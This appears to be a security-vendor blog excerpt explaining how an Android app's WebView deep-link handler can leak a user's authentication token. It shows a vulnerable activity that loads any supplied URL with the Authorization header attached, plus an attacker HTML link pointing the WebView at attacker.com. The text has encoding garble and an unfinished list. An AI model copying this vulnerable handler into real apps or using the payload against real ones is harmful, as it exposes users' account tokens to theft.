đ CloudSEK has raised $19M Series B1 Round â Powering the Future of Predictive Cybersecurity
Read more
WebView is a simple but powerful way to present web-based content in Android. It is used as a dedicated web browser instance of an application that can deliver web pages to users. WebView was first released as a part of Android 4.4. Since Android 5.0, it is included as a system application.
WebView vulnerabilities that allow threat actors to:
We will use the following AndroidManifest.xml file to understand how threat actors can exploit WebView
<activity android:name=”.DeeplinkActivity”>
<intent-filter> <action android:name=”android.intent.action.VIEW” /> <category android:name=”android.intent.category.DEFAULT” /> <data android:scheme=”myapp” android:host=”deeplink” /> </intent-filter> </activity> |
---|
Letâs assume that this file can process WebView deep links:
public class DeeplinkActivity extends Activity {
protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); handleDeeplink(getIntent()); } private void handleDeeplink(Intent intent) { Uri deeplink = intent.getData(); if (“/webview”.equals(deeplink.getPath())) { String url = deeplink.getQueryParameter(“url”); handleWebViewDeeplink(url); } } private void handleWebViewDeeplink(String url) { WebView webView = …; setupWebView(webView); webView.loadUrl(url, getAuthHeaders()); } private Map<String, String> getAuthHeaders() { Map<String, String> headers = new HashMap<>(); headers.put(“Authorization”, getUserToken()); return headers; } } |
---|
In this case an attacker can carry out a remote attack to obtain the userâs authentication token by creating a page with the following code:
<html>
<body style=”text-align: center;”> <h1><a href=”myapp://deeplink/webview?url=https://attacker.com/“>Click Me!</a></h1> </body></html> |
---|
When the victim clicks on the âclick meâ button, the vulnerable app will open https://attacker[.]com, in the WebView, along with the authorization header. The attacker can use the stolen authentication tokens to gain full access to the victimâs account.